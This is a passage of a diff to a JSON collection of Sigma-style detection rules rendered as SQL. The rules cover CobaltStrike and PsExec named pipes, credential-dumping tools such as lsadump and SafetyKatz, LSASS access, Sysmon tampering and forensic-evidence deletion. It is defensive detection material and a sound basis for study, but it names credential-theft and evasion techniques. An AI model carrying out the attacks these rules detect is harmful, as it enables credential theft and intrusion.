OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR 
PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects 
Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": 
"1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 
'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": 
"Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP 
'^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE 
'\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt 
to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", 
- "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', 
'0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs 
WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": 